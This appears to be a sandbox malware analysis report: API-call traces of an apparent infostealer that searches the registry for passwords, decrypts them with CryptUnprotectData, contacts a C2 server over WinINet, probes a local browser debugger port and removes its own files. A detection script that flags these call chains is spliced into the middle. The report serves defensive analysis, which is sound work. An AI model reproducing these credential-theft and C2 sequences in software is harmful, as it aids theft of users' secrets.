                                                      • lstrcat.KERNEL32(00000000,006389F0), ref: 02C714C0
                                                      • lstrlen.KERNEL32(00431788), ref: 02C714CB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C714EF
                                                      • lstrcat.KERNEL32(00000000,00431788), ref: 02C714FB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C71521
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C71566
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C71575
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7159C
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C715A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C715DF
                                                      • lstrcat.KERNEL32(00000000), ref: 02C715EC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C71613
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C7163C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71668
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C716A4
                                                        • Part of subcall function 02C8F227: lstrcpy.KERNEL32(00000000,?), ref: 02C8F259
                                                      • DeleteFileA.KERNEL32(?), ref: 02C716D8
                                                      • memset.MSVCRT ref: 02C716F5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 1397529057-0
                                                      • Opcode ID: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
                                                      • Instruction ID: bfd1e2df305d0854c645afbe011aa96879ee451d612d00d6b16d562f5fb82b7a
                                                      • Opcode Fuzzy Hash: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
                                                      • Instruction Fuzzy Hash: 36A191B5A016469BDB10EFB5CC89E9E7BBAEF44304F084024E809E7250EB74DA45DFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32 ref: 02C8AF86
                                                      • lstrlen.KERNEL32(00638DD4), ref: 02C8AF9C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8AFC4
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8AFCF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8AFF8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B03B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B045
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B06E
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C8B088
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B0AA
                                                      • lstrcat.KERNEL32(00000000,00434ADC), ref: 02C8B0B6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B0DF
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C8B0F1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B113
                                                      • lstrcat.KERNEL32(00000000,00434ADC), ref: 02C8B11F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B148
                                                      • lstrlen.KERNEL32(00638DB8), ref: 02C8B15E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B186
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B191
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B1BA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8B1F6
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B200
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B226
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8B23C
                                                      • lstrcpy.KERNEL32(00000000,00638A98), ref: 02C8B26F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen
                                                      • String ID:
                                                      • API String ID: 2762123234-0
                                                      • Opcode ID: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
                                                      • Instruction ID: 2a3980d620f1e79ff1105aac88e213a2a81ea9e2a25a8b22ba1e62ee7529628d
                                                      • Opcode Fuzzy Hash: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
                                                      • Instruction Fuzzy Hash: B0B15D719016169BDB11FF74CC88AAEB7B6EF8030CF048529E815E7250EB74EA45EF91
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C91C86
                                                      • lstrlen.KERNEL32(00638DEC), ref: 02C91C97
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CBE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91CC9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CF8
                                                      • lstrlen.KERNEL32(00434FA8), ref: 02C91D0A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D2B
                                                      • lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91D37
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D66
                                                      • lstrlen.KERNEL32(00638B1C), ref: 02C91D7C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91DA3
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91DAE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91DDD
                                                      • lstrlen.KERNEL32(00434FA8), ref: 02C91DEF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E10
                                                      • lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91E1C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E4B
                                                      • lstrlen.KERNEL32(00638D70), ref: 02C91E61
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E88
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91E93
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91EC2
                                                      • lstrlen.KERNEL32(00638D6C), ref: 02C91ED8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91EFF
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91F0A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91F39
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: 3ed29eb2a36c33d740b86cf4f2910b79400a7080f226144e00af5aafdd96284d
                                                      • Instruction ID: 6309a4207c0e1c164571bda107048ee6c72b24e748fdf3eb3577b699fd497e06
                                                      • Opcode Fuzzy Hash: 3ed29eb2a36c33d740b86cf4f2910b79400a7080f226144e00af5aafdd96284d
                                                      • Instruction Fuzzy Hash: 4B9163B1600743DFDB209FB9CD8DA1677EEEF54348B185828A886D3650DBB4D940DF60
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84B5A
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02C84B8C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84BD9
                                                      • lstrlen.KERNEL32(00434B68), ref: 02C84BE4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C01
                                                      • lstrcat.KERNEL32(00000000,00434B68), ref: 02C84C0D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C32
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C5F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84C6A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C91
                                                      • StrStrA.SHLWAPI(?,00000000), ref: 02C84CA3
                                                      • lstrlen.KERNEL32(?), ref: 02C84CB7
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84CF8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84D7F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DA8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DD1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DF7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84E24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                      • API String ID: 4107348322-3310892237
                                                      • Opcode ID: d1396ed1204108ce90e311fad75970def6b21bff9892f976cce6df64658cec1e
                                                      • Instruction ID: 0f67d9bcbd9bb5752692d64fdd45431dd8471941272f89c778a4f0a1710e2deb
                                                      • Opcode Fuzzy Hash: d1396ed1204108ce90e311fad75970def6b21bff9892f976cce6df64658cec1e
                                                      • Instruction Fuzzy Hash: EBB1B375A016479BDB24FF79CD84AAE7BA6EF94308F048428EC01A7610EB34ED45DF91
                                                      APIs
                                                      • lstrlen.KERNEL32(00638DB4), ref: 02C8F75C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F7EA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F80E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F8C2
                                                      • lstrcpy.KERNEL32(00000000,00638DB4), ref: 02C8F902
                                                      • lstrcpy.KERNEL32(00000000,00638C7C), ref: 02C8F931
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F9E5
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02C8FA63
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FA93
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FAE1
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8FB5F
                                                      • lstrlen.KERNEL32(00638DBC), ref: 02C8FB8D
                                                      • lstrcpy.KERNEL32(00000000,00638DBC), ref: 02C8FBB8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8FBDA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FC2B
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8FE79
                                                      • lstrlen.KERNEL32(00638BB0), ref: 02C8FEA7
                                                      • lstrcpy.KERNEL32(00000000,00638BB0), ref: 02C8FED2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8FEF4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FF45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: ERROR
                                                      • API String ID: 367037083-2861137601
                                                      • Opcode ID: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
                                                      • Instruction ID: 5f4ca481ea00ccc04e87db0883023208b1b1c46fe32ffa3119813e8120246c2b
                                                      • Opcode Fuzzy Hash: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
                                                      • Instruction Fuzzy Hash: 9AF14E30A01602CFDB24EF29C884B69B7E6BF8531CB68C1ADD8099B761E775D941CF91
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C76ED6
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C76F29
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 02C76F3C
                                                      • StrCmpCA.SHLWAPI(?,00638C80), ref: 02C76F54
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02C76F7C
                                                      • HttpOpenRequestA.WININET(00000000,00434AC0,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 02C76FB7
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02C76FDE
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02C76FED
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02C7700C
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02C77066
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C770C2
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 02C770E4
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C770F5
                                                      • InternetCloseHandle.WININET(?), ref: 02C770FF
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C77109
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7712A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR
                                                      • API String ID: 3687753495-2861137601
                                                      • Opcode ID: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
                                                      • Instruction ID: 7b035a52bd0ba91ed76b9492d74b1d662c5717ae21b07cc4031770bca511bf89
                                                      • Opcode Fuzzy Hash: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
                                                      • Instruction Fuzzy Hash: 9D819471A0171AAFEB10DFA4DC85FAEB7B9EF44704F144168F905E7280DB70AA458BE4
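                                                       The "APIs" listings in this report share one line format: an API name, the module it was resolved from, the recovered argument list, and the address of the call site, with "Part of subcall function" marking calls that happen inside a callee. The script below is an added example written for this page, not part of the Joe Sandbox report or its IDA plugin output. It parses that format and flags two behaviours that the listings above and below show for this sample: the complete WinINet request chain (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile) used to talk to the C2, and the registry read followed by CopyFileA then DeleteFileA used to stage a copy of a file before deleting it. The sample inputs are lines copied from this page; the chain definitions, the line regex and all function names are the example's own assumptions, not Joe Sandbox signatures.

```python
import re
from collections import Counter

# One Joe Sandbox "APIs" line takes one of three shapes (all present in this report):
#   • api.MODULE(arg1,arg2,...), ref: ADDRESS
#   • api.MODULE ref: ADDRESS                          (no argument list recovered)
#   • Part of subcall function ADDR: api.MODULE(...), ref: ADDRESS
# The regex is an assumption inferred from those lines, not a documented Joe Sandbox grammar.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Sample input: lines copied verbatim from the listings on this page.
SAMPLE_WININET = """\
• lstrcpy.KERNEL32(00000000,?), ref: 02C76ED6
• lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C76F29
• InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 02C76F3C
• StrCmpCA.SHLWAPI(?,00638C80), ref: 02C76F54
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02C76F7C
• HttpOpenRequestA.WININET(00000000,00434AC0,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 02C76FB7
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02C76FDE
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02C76FED
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02C7700C
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02C77066
• InternetCloseHandle.WININET(00000000), ref: 02C770F5
"""
SAMPLE_FILECOPY = """\
• memset.MSVCRT ref: 02C71411
  • Part of subcall function 02C71387: RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 02C713C0
  • Part of subcall function 02C71387: RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 02C713DA
• lstrcat.KERNEL32(?,00000000), ref: 02C71427
• CopyFileA.KERNEL32(?,?,00000001), ref: 02C7163C
• DeleteFileA.KERNEL32(?), ref: 02C716D8
• memset.MSVCRT ref: 02C716F5
"""
SAMPLE_DEBUGGER = """\
• InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
  • Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
"""


def parse_api_lines(text):
    """Return the parsed calls in the order they appear in the listing."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers such as "APIs" or "Memory Dump Source" are skipped
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # None for the function's own call sites
        })
    return calls


def own_call_sequence(calls):
    """API names of the function's own calls, ordered by call-site address (subcalls excluded)."""
    own = [c for c in calls if c["subcall"] is None]
    return [c["api"] for c in sorted(own, key=lambda c: c["ref"])]


def contains_in_order(sequence, pattern):
    """True if every name in `pattern` occurs in `sequence` in that order, gaps allowed."""
    it = iter(sequence)
    return all(any(name == wanted for name in it) for wanted in pattern)


# Behavioural chains this example looks for (the example's own choice, not report signatures).
WININET_REQUEST = ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                   "HttpSendRequestA", "InternetReadFile")
COPY_THEN_DELETE = ("CopyFileA", "DeleteFileA")


def classify_function(text):
    """Summarise one function's API listing and flag the chains above."""
    calls = parse_api_lines(text)
    seq = own_call_sequence(calls)
    counts = Counter(c["api"] for c in calls if c["subcall"] is None)
    return {
        "calls": len(calls),
        "top_api": counts.most_common(1)[0][0] if counts else None,
        "wininet_request": contains_in_order(seq, WININET_REQUEST),
        "copy_then_delete": contains_in_order(seq, COPY_THEN_DELETE),
        "registry_read_in_subcall": any(
            c["subcall"] and c["api"].startswith("RegQueryValue") for c in calls),
        # literal URLs recovered as arguments, e.g. the local debugger probe
        "url_literals": sorted({a for c in calls for a in c["args"] if "://" in a}),
    }


if __name__ == "__main__":
    for name, text in (("wininet", SAMPLE_WININET), ("filecopy", SAMPLE_FILECOPY),
                       ("debugger", SAMPLE_DEBUGGER)):
        print(name, classify_function(text))
```

The ordering check sorts the function's own call sites by address before matching, so the listing order on the page does not need to be trusted; subcall lines are excluded from the sequence because their addresses belong to a different function. Lines whose argument list was not recovered (for example "memset.MSVCRT ref: 02C71411") parse with an empty argument list rather than being dropped.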
                                                      APIs
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
                                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                                                      • InternetCloseHandle.WININET(00000000), ref: 00409109
                                                      • strlen.MSVCRT ref: 00409125
                                                      • InternetReadFile.WININET(?,?,?,00000000), ref: 00409166
                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091A9
                                                      • strlen.MSVCRT ref: 004091BA
                                                      • strlen.MSVCRT ref: 004091ED
                                                      • strlen.MSVCRT ref: 0040922E
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
                                                        • Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8
                                                      • strlen.MSVCRT ref: 0040924C
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                      • API String ID: 4166274400-2144369209
                                                      • Opcode ID: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
                                                      • Instruction ID: 3da038be7106f6833ad32b0a15d05febb0a1008003ef6f9fefd8fd85e3a80bf5
                                                      • Opcode Fuzzy Hash: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
                                                      • Instruction Fuzzy Hash: 1651B771740205ABE720DBA8DC45BDEF7B9DF48710F14016AF505B32C1DBB8A94587A9
                                                      APIs
                                                        • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
                                                      • RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 02C93BF4
                                                      • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02C93C2E
                                                      • wsprintfA.USER32 ref: 02C93C59
                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02C93C77
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93C85
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93C8F
                                                      • RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 02C93CD8
                                                      • lstrlen.KERNEL32(?), ref: 02C93CED
                                                      • RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 02C93D5E
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93DA9
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93DC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                                      • String ID: - $?
                                                      • API String ID: 13140697-712516993
                                                      • Opcode ID: b62d206b9e23e30b0fb799a6e291ddc077a55a8e51b40d8956c223b173a496a6
                                                      • Instruction ID: 62ea69fbb349c53a8b3eeeae4280ff0e31f39a8b5a50dbf37b25519077b66a83
                                                      • Opcode Fuzzy Hash: b62d206b9e23e30b0fb799a6e291ddc077a55a8e51b40d8956c223b173a496a6
                                                      • Instruction Fuzzy Hash: BA9160B29002499FCF10DF98DD889EEB7BAFF88314F1581A9E509A7250D7319E45CF90
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                                                      • strlen.MSVCRT ref: 0040787E
                                                      • StrStrA.SHLWAPI(?,Password), ref: 004078B8
                                                      • strlen.MSVCRT ref: 0040794D
                                                        • Part of subcall function 00407750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                                                        • Part of subcall function 00407750: HeapAlloc.KERNEL32(00000000), ref: 00407765
                                                        • Part of subcall function 00407750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                                                        • Part of subcall function 00407750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                                                        • Part of subcall function 00407750: LocalFree.KERNEL32(?), ref: 004077B7
                                                      • strcpy_s.MSVCRT ref: 004078E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                                                      • HeapFree.KERNEL32(00000000), ref: 004078F3
                                                      • strlen.MSVCRT ref: 00407900
                                                      • strcpy_s.MSVCRT ref: 0040792A
                                                      • strlen.MSVCRT ref: 00407974
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407A35
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID: Password
                                                      • API String ID: 3893107980-3434357891
                                                      • Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction ID: faa8cd0a279a4eff08d681149dd2f2cc35a0fe7e2d41fdb8b82cccc84e003d60
                                                      • Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction Fuzzy Hash: 1581ECB1D0021DAFDB10DF95DC84ADEBBB9EF48300F10416AE509B7250EB75AA85CFA5
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 02C91AD8
                                                      • lstrcpy.KERNEL32(00000000,00638C44), ref: 02C91B03
                                                      • lstrlen.KERNEL32(?), ref: 02C91B10
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91B2D
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C91B3B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91B61
                                                      • lstrlen.KERNEL32(00638AA8), ref: 02C91B76
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C91B99
                                                      • lstrcat.KERNEL32(00000000,00638AA8), ref: 02C91BA1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91BC9
                                                      • ShellExecuteEx.SHELL32(?), ref: 02C91C04
                                                      • ExitProcess.KERNEL32 ref: 02C91C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                                      • String ID: <
                                                      • API String ID: 3579039295-4251816714
                                                      • Opcode ID: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                                                      • Instruction ID: ea3ad6b5b1359803a729766cf9bdea6e35e850b4eead8d6073c8098f9ab595e2
                                                      • Opcode Fuzzy Hash: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                                                      • Instruction Fuzzy Hash: A05197B190161A9FDB10DF79CC84A9DBBFBAF84304F045125E905E3250EB709B05DF90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F1C4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F1F2
